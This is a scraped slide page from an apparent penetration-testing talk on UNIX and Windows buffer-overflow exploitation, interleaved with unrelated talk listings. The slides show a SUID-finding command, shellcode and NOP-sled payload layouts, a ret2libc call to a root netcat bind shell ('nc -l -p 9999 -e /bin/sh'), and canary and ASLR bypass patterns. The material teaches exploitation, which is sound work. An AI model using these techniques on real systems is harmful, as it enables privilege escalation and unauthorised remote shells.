This document discusses various techniques for exploiting UNIX executable programs, including buffer overflow vulnerabilities. It begins with an introduction and outlines an agenda covering vulnerable UNIX applications, memory layout and stacks, buffer overflows, shellcode, and various protection mechanisms and bypass techniques. These include basic stack overflows, bypassing password protections, limited stack spaces, Ret-2-libc exploits, and return-oriented programming (ROP) chains to execute multiple commands. Demo exploits are proposed to show gaining root privilege on vulnerable applications.
Tracing MariaDB server with bpftrace - MariaDB Server Fest 2021Valeriy Kravchuk
Bpftrace is a relatively new eBPF-based open source tracer for modern Linux versions (kernels 5.x.y) that is useful for analyzing production performance problems and troubleshooting software. Basic usage of the tool, as well as bpftrace one liners and advanced scripts useful for MariaDB DBAs are presented. Problems of MariaDB Server dynamic tracing with bpftrace and some possible solutions and alternative tracing tools are discussed.
Tracing MariaDB server with bpftrace - MariaDB Server Fest 2021Valeriy Kravchuk
Bpftrace is a relatively new eBPF-based open source tracer for modern Linux versions (kernels 5.x.y) that is useful for analyzing production performance problems and troubleshooting software. Basic usage of the tool, as well as bpftrace one liners and advanced scripts useful for MariaDB DBAs are presented. Problems of MariaDB Server dynamic tracing with bpftrace and some possible solutions and alternative tracing tools are discussed.
UM2019 Extended BPF: A New Type of SoftwareBrendan Gregg
Keynote for Ubuntu Masters 2019 by Brendan Gregg, Netflix. Video https://www.youtube.com/watch?v=7pmXdG8-7WU&feature=youtu.be . "Extended BPF is a new type of software, and the first fundamental change to how kernels are used in 50 years. This new type of software is already in use by major companies: Netflix has 14 BPF programs running by default on all of its cloud servers, which run Ubuntu Linux. Facebook has 40 BPF programs running by default. Extended BPF is composed of an in-kernel runtime for executing a virtual BPF instruction set through a safety verifier and with JIT compilation. So far it has been used for software defined networking, performance tools, security policies, and device drivers, with more uses planned and more we have yet to think of. It is changing how we use and think about systems. This talk explores the past, present, and future of BPF, with BPF performance tools as a use case."
Full table BGP on VyOS converge time in seconds
Routing on MikroTiks converges near-instantly
BCP38 (customers cannot spoof source address)
IRR filtering (only accept where route/route6 object)
RPKI (will not accept invalid routes from P/T)
Templated configuration (repeatable, automated)
Single source of truth (the docs become the config)
VyOS SaltStack YAML Netbox BGP OSPF FRR RPKI IRR XDP
bgpq3 UTRS RTBH NetFlow
RIPE NCC Update 2019-10-02
eBPF is an exciting new technology that is poised to transform Linux performance engineering. eBPF enables users to dynamically and programatically trace any kernel or user space code path, safely and efficiently. However, understanding eBPF is not so simple. The goal of this talk is to give audiences a fundamental understanding of eBPF, how it interconnects existing Linux tracing technologies, and provides a powerful aplatform to solve any Linux performance problem.
[2007 CodeEngn Conference 01] amesianx - Art of HookingGangSeok Lee
2007 CodeEngn Conference 01
ActiveX Binary 조작 및 후킹 ActiveX Binary 조작을 하지않는 범용적 COM 후킹 키보드 후킹은 크래커가 가장 직관적으로 접근하는 해킹수단 등에 대해서 설명하고 ActiveX의 COM에 대해 알아본다. (키보드 후킹의 한계는 사용자 입력을 예상하기 힘들고 정확히 어떤 행동 중인지 포착하는 인공지능적 해킹이 어려운 점이 있다.)
http://codeengn.com/conference/01
Root the Box - An Open Source Platform for CTF AdministrationChristopher Grayson
These are the slides presented at Outerz0ne conference in 2014. The contents detail CTF competitions, the Root the Box software platform and competition, and resources for sharpening your CTF and penetration testing skills!
UM2019 Extended BPF: A New Type of SoftwareBrendan Gregg
Keynote for Ubuntu Masters 2019 by Brendan Gregg, Netflix. Video https://www.youtube.com/watch?v=7pmXdG8-7WU&feature=youtu.be . "Extended BPF is a new type of software, and the first fundamental change to how kernels are used in 50 years. This new type of software is already in use by major companies: Netflix has 14 BPF programs running by default on all of its cloud servers, which run Ubuntu Linux. Facebook has 40 BPF programs running by default. Extended BPF is composed of an in-kernel runtime for executing a virtual BPF instruction set through a safety verifier and with JIT compilation. So far it has been used for software defined networking, performance tools, security policies, and device drivers, with more uses planned and more we have yet to think of. It is changing how we use and think about systems. This talk explores the past, present, and future of BPF, with BPF performance tools as a use case."
Full table BGP on VyOS converge time in seconds
Routing on MikroTiks converges near-instantly
BCP38 (customers cannot spoof source address)
IRR filtering (only accept where route/route6 object)
RPKI (will not accept invalid routes from P/T)
Templated configuration (repeatable, automated)
Single source of truth (the docs become the config)
VyOS SaltStack YAML Netbox BGP OSPF FRR RPKI IRR XDP
bgpq3 UTRS RTBH NetFlow
RIPE NCC Update 2019-10-02
eBPF is an exciting new technology that is poised to transform Linux performance engineering. eBPF enables users to dynamically and programatically trace any kernel or user space code path, safely and efficiently. However, understanding eBPF is not so simple. The goal of this talk is to give audiences a fundamental understanding of eBPF, how it interconnects existing Linux tracing technologies, and provides a powerful aplatform to solve any Linux performance problem.
[2007 CodeEngn Conference 01] amesianx - Art of HookingGangSeok Lee
2007 CodeEngn Conference 01
ActiveX Binary 조작 및 후킹 ActiveX Binary 조작을 하지않는 범용적 COM 후킹 키보드 후킹은 크래커가 가장 직관적으로 접근하는 해킹수단 등에 대해서 설명하고 ActiveX의 COM에 대해 알아본다. (키보드 후킹의 한계는 사용자 입력을 예상하기 힘들고 정확히 어떤 행동 중인지 포착하는 인공지능적 해킹이 어려운 점이 있다.)
http://codeengn.com/conference/01
Root the Box - An Open Source Platform for CTF AdministrationChristopher Grayson
These are the slides presented at Outerz0ne conference in 2014. The contents detail CTF competitions, the Root the Box software platform and competition, and resources for sharpening your CTF and penetration testing skills!
Virus Bulletin 2007 Vienna presentation on the "Storm worm" (even though it wasn’t really a "worm" in the classic sense). My reversing details of its kernel-level injection techniques were not publicly documented at the time.
Particularly proud of this one after some of the talented Avira guys gave some compliments on my slides’ details of the storm web pages’ javascript, exploit, and shellcode details.
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Michele Orru
Browser exploits are a primary attack vector to compromise a victims internal network, but they have major restrictions including; limited current browser exploits; the huge price for 0-day browser exploits; and exploit complexity due to sandboxing. So, instead of exploiting the victims browser, what if the victims browser exploited internal systems for you?
The new "BeEF Bind Exploit Proxy" module does this! This BeEF (Browser Exploitation Framework) module will allow penetration testers to proxy exploits through a victims web browser to compromise internal services. Not only this, but the new "BeEF Bind" shellcode also enables the communication channel to the attacker to pass back through the existing browser session.
This attack technique (Inter-protocol Exploitation) removes browser-based attacks from being dependent upon browser vulnerabilities. It increases the number of potential exploits to include many service vulnerabilities throughout the internal corporate network. This includes whatever service can be contacted via a browser request. This increases the success rate of client-side exploitation attempts by dramatically increasing the number of vulnerabilities accessible to the attacker.
So how does the new BeEF Bind Exploit Proxy work? BeEF is configured to use the BeEF Bind Exploit Proxy, and is set as the payload for XSS exploits or Phishing attacks. Once the victim visits the malicious site, their web browser becomes hooked and performs JavaScript port scanning across the internal corporate network looking for chosen open ports. Once a server has been identified, the BeEF server is notified and begins to send exploits through the hooked web browser to the service on the internal server. Each of these exploits are configured to use the new BeEF Bind shellcode.
Once an exploit has successfully triggered a vulnerability within the internal service, the BeEF Bind shellcode is executed. This shellcode is designed to setup a web-listener that proxies commands through to a shell on the compromised server. This allows the attacker to send commands through the hooked web browser to the BeEF Bind payload. The command is executed on the compromised server and returned to the web browser in HTTP responses. The hooked web browser is then able to receive the command output and proxy it back to the attacker at the BeEF server.
Penetration testers can now inject steroids into their XSS exploits by replacing simple alert boxes with demonstrations of actual compromised internal machines. They can also now increase the scope and success rate of their Phishing attacks to compromise internal servers. This new approach also minimizes the likelihood of IDS/IPS detection, and does not require an additional socket open back to the attacker via the firewall.
Purchasing power parity a unit root, cointegration and var analysis in emergi...Giwrgos Loukopoulos
The purpose of this study is to investigate the validity of the absolute version of the purchasing power parity (PPP) of a sample of four advanced and four emerging countries covering the period from 1993 to 2014. To examine the existence of PPP we apply the Augmented Dickey-Fuller, DF-GLS and KPSS tests for non-stationarity, and the Johansen procedure for cointegration between exchange rates and consumer price indices. The impulse response function presents a graphical view which is consistent with impressions from the statistics of stationarity tests. We also employ the variance decomposition method to analyze the movements in the exchange rates and the price indices that are caused by their own shocks, and shocks caused by other variables. With respect to half-life estimates, the results from a shock to the real exchange rate range from 9,76 to 77,39 months. Overall, unit root tests show that absolute PPP may hold, but this depends on the country and the selected method. In contrast, the Johansen approach does not support the existence of PPP in any country.
In this presentation it is described how to create a jQuery Modal Window using Likno Web Modal Windows Builder.
Likno Web Modal Windows Builder is a powerful application for creating any type of jQuery Modal Windows (popup boxes, dialog boxes, etc.).
Likno Web Modal Windows Builder info: http://www.likno.com/jquery-modal-windows/index.php
Examples: http://www.likno.com/jquery-builders/examples.php?p=lwmw&e=n
Download: http://www.likno.com/jquery-modal-windows/download.php
Connect.Tech- Enhancing Your Workflow With Xcode Source Editor Extensionsstable|kernel
Developers are constantly refining their workflow in order to master their craft. There is a plethora of tools available that can help bootstrap a project, increase efficiency, or simply make developers happy. Let’s explore the newly introduced Xcode Source Editor Extensions; an Application Extension that gives developers the power to create custom actions in Xcode’s Editor menu.
Salesforce at Stacki Atlanta Meetup February 2016StackIQ
Dave Peterson's presentation on how Salesforce uses Stacki and Chef to provision and manage thousands of servers. Stacki Atlanta kickoff Meetup on 2/23/16 at the Microsoft Innovation Center. Dave is a Lead Systems Engineer at Salesforce.
various tricks for remote linux exploits by Seok-Ha Lee (wh1ant)CODE BLUE
Modern operating systems include hardened security mechanisms to block exploit attempts. ASLR and NX (DEP) are two examples of the mechanisms that are widely implemented for the sake of security. However, there exists ways to bypass such protections by leveraging advanced exploitation techniques. It becomes harder to achieve code execution when the exploitation originates from a remote location, such as when the attack originates from a client, targeting server daemons. In such cases it is harder to find out the context information of target systems and, therefore, harder to achieve code execution. Knowledge on the memory layout of the targeted process is a crucial piece of the puzzle in developing an exploit, but it is harder to figure out when the exploit attempt is performed remotely. Recently, there have been techniques to leverage information disclosure (memory leak) vulnerabilities to figure out where specific library modules are loaded in the memory layout space, and such classes of vulnerabilities have been proven to be useful to bypass ASLR. However, there is also a different way of figuring out the memory layout of a process running in a remote environment. This method involves probing for valid addresses in target remote process. In a Linux environment, forked child processes will inherit already randomized memory layout from the parent process. Thus every client connection made to server daemons will share the same memory layout. The memory layout randomization is only done during the startup of the parent service process, and not randomized again when it is forking a child process to handle client connections. Due to the inheritance of child processes, it is possible to figure out a small piece of different information from every connection, and these pieces can be assembled later to get the idea of a big picture of the target process's remote memory layout. Probing to see if a given address is a valid memory address in context of the target remote process and assembling such information together, an attacker can figure out where the libc library is loaded on the memory, thus allowing exploits to succeed further in code execution. One might call it brute force, but with a smart brute forcing strategy, the number of minimal required attempts are significantly reduced to less than 10 in usual cases. In this talk, we will be talking about how it is possible to probe for memory layout space utilizing a piece of code to put the target in a blocked state, and to achieve stable code execution in remote exploit attempt scenarios using such information, as well as other tricks that are often used in remote exploit development in the Linux environment.
http://codeblue.jp/en-speaker.html#SeokHaLee
Talk given by David Peterson, Lead Systems Engineer at Salesforce, at StackiFest in March 2016
Enterprise bare metal provisioning using Stacki at Salesforce/Pardot and how we've configured it in our environment. It used to take the Ops teams hours to do end-to-end provisioning with chef integration to now it takes about 15 minutes with it all being automated. In this presentation, I will discuss:
- Why we chose Stacki
- Hardware and provisioning requirements
- Stacki configuration with chef integration
- ZFS and data safe re-provisioning
- Detecting issues and adhoc reporting
Nowadays, scaling and auto-scaling have become relatively easy tasks. Everyone knows how to set up auto-scaling environments - Auto-Scaling groups, Swarm, Kubernetes, etc.
But when we try to scale I/O Bound workloads:
- Message queues (Kafka, Rabbit, NATS)
- Distributed databases (Hadoop, Cassandra)
- Storage subsystems (CEPH, GlusterFS, HDFS),
the traditional auto-scaling mechanisms are just not enough.
Heavy calculations must be performed to determine the I/O bottlenecks. Rebalancing the data after a scaling event can take up to hours depending on your data & could, resulting in data loss if not properly designed.
We will deep dive into this type of workload and walk you through code samples you can apply in your own environment.
Presentation from DICE Coder's Day (2010 November) by Andreas Fredriksson in the Frostbite team.
Goes into detail about Scope Stacks, which are a systems programming tool for memory layout that provides
• Deterministic memory map behavior
• Single-cycle allocation speed
• Regular C++ object life cycle for objects that need it
This makes it very suitable for games.
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
"Impact of front-end architecture on development cost", Viktor TurskyiFwdays
I have heard many times that architecture is not important for the front-end. Also, many times I have seen how developers implement features on the front-end just following the standard rules for a framework and think that this is enough to successfully launch the project, and then the project fails. How to prevent this and what approach to choose? I have launched dozens of complex projects and during the talk we will analyze which approaches have worked for me and which have not.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
3. “There are some relationships between
- Reverse Engineering
- Buffer overflow
- Shellcode
They are the complement of each other”
“Sleepy Kama”
#Inspiration
8. VULNERABLE UNIX APPLICATION
Has permission “root” as user or group
SUID or SGID is set (Sting S at eXecute bit)
This 2 criteria provided privilege escalation to be root
list="$(find / -perm -4000 -o -perm -2000)";for i in
$list; do ls -al $i; done
ls –R / | grep “wsr” | grep “root”
10. VULNERABLE UNIX APPLICATION
Use vulnerable input standard function
Ex: strcp(), gets(), sprintf (), vsprintf ()
They make the program can possibly segmentation
fault or buffer overflow
21. BUFFER OVERFLOW
The situation when the data that input to the
system is larger than the size of buffer that
declare to be used
AAAAAAAAAA....[607 of A]….AAAx00 SFP RP
AAAAAAAAAA….[616 of A]….AAAAAAAAAAAAAAx00
SFP = 0x41414141
***RP = 0x41414141
“Segmentation fault”
“Illegal Instruction”
SFP RP
Ex: char pw[608];
22. “How can we detect
buffer overflow in unix application?”
35. “Imagine if we can control Return Pointer to
our own Instruction”
“So, we can control the whole system”
36. SHELL CODE
[Malicious Machine OpCode] + AAAAAAAAAAAAAAA
SFP = 0x41414141
***RP = 0xFBFF0544
0xFBFF0544
0xFBFF0544
SFP RP
Attacker can control return pointer to run Malicious
Machine OpCode that put to memory (Shell Code).
Insert shell code as a part of input to reduce the
complexity of exploitation
37. SHELL CODE
Shell code is the code that attacker want the
system run in order to operate the command as
attacker need (create form assembly and convert
to OpCode
Ex;
Open port for connection to that system with root privilege
Add user to the system
Run shell as root privilege
Shell code is written as Hexadecimal format
38. “What happen if we can make Return Pointer
system_call /bin/sh
by programrun as root ?”
43. Where can we get shell code use to make exploit. ?
Create your own shell code (quite take time)
Use Metasploit to generate shell code
Metepreter
Search from internet
shell-storm.org/shellcode
packetstormsecurity.com
www.exploit-db.com/exploits
SHELL CODE
73. LIMITED STACK SPACE
[ NOP Space (NOP Sledding)] + [S h e l l C o d e ]
AAAAAAAAAAAAA…[612 of A]…AAAAAAAA
SFP = 0x41414141
***RP = 0xBFFFxxxx ??? (We don’t know yet)
0xFBFFxxxx
0xFBFFxxxx
SFP RP
If size of buffer is limited, we need to put some
shell code some where in stack and control RP to
run shell code
77. Demo #3
Exploit to get root privilege
With Limited Stack Space
LIMITED STACK SPACE
78. SUMMARY
Grant()main()AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA RP
x90x90x90 x90x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA RP
x90 x90x90x90x90x90x90 + [Shell Code]AAAAAAAAAAAAAAAAAAAAAAAAAAA RP AAAAA
Bypass password protection
Buffer overflow to run shellcode to get root privilege
Buffer overflow to run shellcode with limited Stack Space
83. Characteristic of vulnerable program
Has set SUID, GUID
Can Overflow
Use Libc.
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
84. “What happen if we jump RP and run?”
system_call nc –l –p 9999 –e /bin/sh
85. Fool program to make system call with evil
command
System_call nc -l -p 9999 -e /bin/sh
AAAAAAAAAAAAA
If Arg = “nc -l -p 9999 -e /bin/sh” and Program run as “root”
So, “nc –l –p 9999 –e /bin/sh” run as “root”
SFP
RP Argsystem
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
86. Find location of “system” call function
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
87. Create “evil” Argument as system global variable
AAAAAAAAAAAAA
SFP RP =
Argsystem
xf0x4execxb7 x98xfaxffxbfNC =
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
115. STACK GUARD (CANARY)
Protection mechanism place in stack (8 byte) to detect
the overflow and preventing to control RP
Need to include when we compile program
gcc -fstack-protector code.c -o myprogram
If canary overwritten the program will be terminated
Type of Canary
NULL canary (0x00000000)
Terminator canary (0x00000aff – 0x000aff0d)
Random canary (Unpredicted 4 byte)
AAAAAAAAAAAAAAAAAAAA AAAA AAAA AAAA
SFP RPCanary
116. For Null canary and Terminator canary can be
defeated by “Canary repaired”
NULL canary only app use gets() function
AAA…AAA00000000AAAA[RP]x90x90x90x[Shellcode]x0a
Terminator canary (always 0x00000aff)
app use gets() function
app use strcpy() function and need more than 1 arg
AAA…AAAAAAA0affAAAA[RP]x90x90x90x[Shellcode]00
BBB…BBBBB00
CCC…CCC00
AAA…AAA00000affAAAA[RP]x90x90x90x[Shellcode]
STACK GUARD (CANARY) DEFEAT
Arg1=
Arg2=
Arg3=
122. ADDRESS SPACE LAYOUT RANDOMIZATION
(ASLR)
Technique use prevent an attacker jumping to a
particular exploited code in memory by random
the virtual address in every runtime.
123. ADDRESS SPACE LAYOUT RANDOMIZATION
(ASLR)
x90x90x90 x90x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAA RP…….
Random is 2 So, Possibility =1/2 or 0.000001
20 20
How can we increase possibility to jump to shell code ?
124. ADDRESS SPACE LAYOUT RANDOMIZATION
(ASLR) DEFEAT METHOD
AAAAAAAAAAAAAAAAAAAAAAA RP /x90/x90/x90/x[ shell code ]…….
JMP ESP
esp
If OS kernel has some static lib kernel < 2.6.20.
Use JMP ESP (Trampoline) instruction in that
static lib to bring RP to shell code
INC EAX ADD EBS, EBP ….
125. ADDRESS SPACE LAYOUT RANDOMIZATION
(ASLR) DEFEAT METHOD
If OS kernel has not static lib (kernel >= 2.6.20 ),
need to write application to call vulnerable
application to limit random address space (App wrap
up)
AAAAAAAAAAAAAAAAAAAAAAAAA
RP /x90/x90/x90/x90/x90/x90/x90/x90
/x90/x90/x90/x90/x90/x90/x90/x90/x90
/x90/x90/x90/x90/x[ shell code ]
Check current ESP value
and Set
RP = ESP + [vul app buffer]
126. Wrap up app
ADDRESS SPACE LAYOUT RANDOMIZATION
(ASLR) DEFEAT METHOD
129. DIFFERENCE OF UNIX AND WINDOWS
APPLICATION EXPLOIT
Unix application directly communicate to kernel
Window application must communicate through
Window API (Not directly communicate to
kernel) . It’s make more difficult to exploit
App Kernel
App KernelAPI
130. WINDOW SHELLCODE
Static Shellcode (Example for window XP)
Static or fix memory address of windows API that use
in exploit code (Specific OS version and SP)
Find address of WinExec() > use to execute cmd / app
Find address of ExitProcess() > use to clear register
Portable Shellcode
Dynamically find memory address of need window
API by using 2 useful windows API
LoadLibraryA() to get Hmodule (DLL's base address )
GetProcessAddress() to get real address of function
Get address of WinExec()
Get address of ExitProcess()
131. Normally, virus use LoadLibraryA() and
GetProcessAddress() to make portable expliot
WINDOW SHELLCODE
135. Found the vulnerability of application
BASIC STACK BUFFER OVERFLOW ON
WINDOWS APPLICATION
136. Input to the system is larger than the size of
buffer that declare to be used
AAAABBBBCCCC.....KKKKLLLLMMMM SFP RP
char local[49];
BASIC STACK BUFFER OVERFLOW ON
WINDOWS APPLICATION
AAAABBBBCCCC.....KKKKLLLLMMMM NNNN OOOOPPPP
ESP
137. Find address to jump to exploit code
BASIC STACK BUFFER OVERFLOW ON
WINDOWS APPLICATION
x90x90x90x90…[shellcode]…AAAAAAAA RP
* RP = “x40xffx13
138. Exploit Successful
BASIC STACK BUFFER OVERFLOW ON
WINDOWS APPLICATION
Successfully exploit.
But calc.exe run as
your permission
not “Administrator”
139. Imagine, if some windows application provide
network service like FTP that start by
“SYSTEM” account and have buffer overflow
vulnerability (Ex: WarFTP app)
BASIC STACK BUFFER OVERFLOW ON
WINDOWS APPLICATION
142. BASIC STACK BUFFER OVERFLOW ON
WINDOWS APPLICATION
FTP 192.168.1.2
USER AAAAAA….AAAA $JMP_ESP x90x90x90x90 SYSCODE
RP
ESP
143. After connect back to open port, user/password
to the system to confirm that we successfully get
system privilege
BASIC STACK BUFFER OVERFLOW ON
WINDOWS APPLICATION
144. Rule of permission gaining in Windows exploit
If we exploit the application, we will get the
permission as who start or run the application
If application or service start or run by
“Administrator” or “SYSTEM” account, we will gain
“Administrator” or “SYSTEM” privilege
All windows vulnerability that attacker use to
compromise OS occurred form successfully exploit
“SYSTEM” service
BASIC WINDOWS EXPLOITATION
145. DLL injection exploitation
SafeSeh (Structured Exception Handling) and Abuse
Windows ASLR and how to defeat
Windows DEP and how to defeat
GS protection in Windows application and how to defeat
Advance pivoting attack technique
HEAP overflow / Heap Spray / Use After free
“Unfortunately, We have not enough time to walk through”
MORE INTERESTING TOPIC FOR WINDOWS
146. CoreLAN team : https://www.corelan.be
NetSEC : http://netsec.ws/?p=180
http://www.cis.syr.edu/~wedu/education/buffer_ov
erflow.html
LEARNING SITE
147. REFERENCE
SANS 660 Advanced Penetration Testing, Exploit
Writing, and Ethical Hacking
GIAC GXPN : Exploit Researcher and Advanced
Penetration Tester
Protecting Against Address Space Layou
Randomization (ASLR) Compromises and Return-to-
Libc Attacks Using Network Intrusion Detection
Systems. David J. Day, Zheng-Xu Zhao, November
2011, Volume 8, Issue 4, pp 472-483
Cowan, C. Buffer Overflow Attacks.
StackGuard:Automatic Adaptive Detection and
Prevention of Buffer-Overflow Attacks. 1 October
2008.
Defeating PaX ASLR protection. Durden, T. 59, s.l.
:Phrack, 2002, Vol. 12.